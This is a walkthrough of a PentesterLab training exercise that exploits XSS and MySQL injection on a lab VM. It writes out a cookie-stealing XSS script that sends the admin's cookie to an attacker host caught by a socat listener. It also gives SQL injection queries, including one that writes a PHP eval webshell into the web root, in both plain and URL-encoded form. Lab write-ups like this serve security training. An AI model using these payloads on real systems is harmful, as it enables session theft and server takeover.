[PentesterLab] XSS and MySQL File

This is an exercise from PentesterLab to reproduce & demonstrate how to exploit XSS and SQL injection vulnerabilities. More information and ISO download please check here. The official course is highly recommended to read, which explains how the vulnerabilities happened and the ways to exploit.

Difficulty: 2 / 5

Links

watch video online:

Method

  • Scanned the network to discover the target server [Net Discover]
  • Port scanned the target to discover the running services and open ports [nmap]
  • Web information gathering [whatweb]
  • Web file system structure detection [DirBuster]
  • Interacted with the web server, found the (Cross Site Script) XSS vulnerable point. [Firefox]
  • Set up the attacker’s server in order to Exploit the XSS vulnerability and get admin session cookie. [socat]
  • After obtain the admin session cookie, log in as administrator and then found SQL injection vulnerable point.
  • Exploit SQL injection to upload web shell.

Tools

All the tools used here can be found in Kali Linux

Walkthrough

By reading the official course pdf, we know that we need to find and exploit a XSS vulnerability to log in as admin. After that, we need to find and exploit a MySQL injection vulnerability in order to upload webshell and control the target server.

Find and Exploit the XSS vulnerability

The attacker interacts with the web server, by using “Firefox” browser to graphically render the web application on the target. Upon viewing the page, the attacker know that there are two goals need to be achieved. First one is log in as administrator and then upload webshell into the target server.

After browsing around the target web site, the attacker found the comment system might be vulnerable to XSS. The attacker try to test if there are XSS vulnerability by using “1337′”><“. The result is a little excited. the server end dose not filter special characters. So the attacker just exploit the XSS and obtain the cookie with admin privilege.

write the following XSS exploit code into the comments:

1
<script> document.write('<img src="http://192.168.1.129/?'+document.cookie+'"/>'); </script>

Set up the attacker’s machine to listen port 80 by using followed socat command.

1
socat TCP-LISTEN:80,reuseaddr,fork –

The attacker will receive admin session cookie as soon as the administrator open the comments page.

Exploit MySQL injection vulnerability and uploading webshell

SQL Injection point:

http://192.168.1.149/admin/edit.php?id=2

Try single quote:

http://192.168.1.149/admin/edit.php?id=2′

Results:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /var/www/classes/post.php on line 111 Notice: Undefined variable: post in /var/www/classes/post.php on line 115

Now the attacker know the target web site’s absolute path is “/var/www/”

Detect backend DB information

attacking code:
http://192.168.1.149/admin/edit.php?id=2 order by 4 — – (OK)
http://192.168.1.149/admin/edit.php?id=2 order by 5 — – (ERROR)

http://192.168.1.149/admin/edit.php?id=-2 union select 1,@@version,user(),4

Results:

1
2
Mysql Version: 5.1.72-2
current DB user: root@localhost

Due to MySQL is now runnnig by root, the attacker will grain root privilege.

Then the attacker is going to upload webshell.

attacking code:

1
http://192.168.1.149/admin/edit.php?id=-2 union select 1,2,"<?php @eval($_POST['chopper'])?>",4 into outfile "/var/www/css/t2.php" — –

attacking code(URL encoded):

1
http://192.168.1.149/admin/edit.php?id=-2%20union%20select%201%2C2%2C%22%3C%3Fphp%20@eval%28%24_POST%5B%27chopper%27%5D%29%3F%3E%22%2C4%20into%20outfile%20%22%2fvar%2fwww%2fcss%2ft2.php%22%20–%20-e
2015-05-09 01:28:19 -0400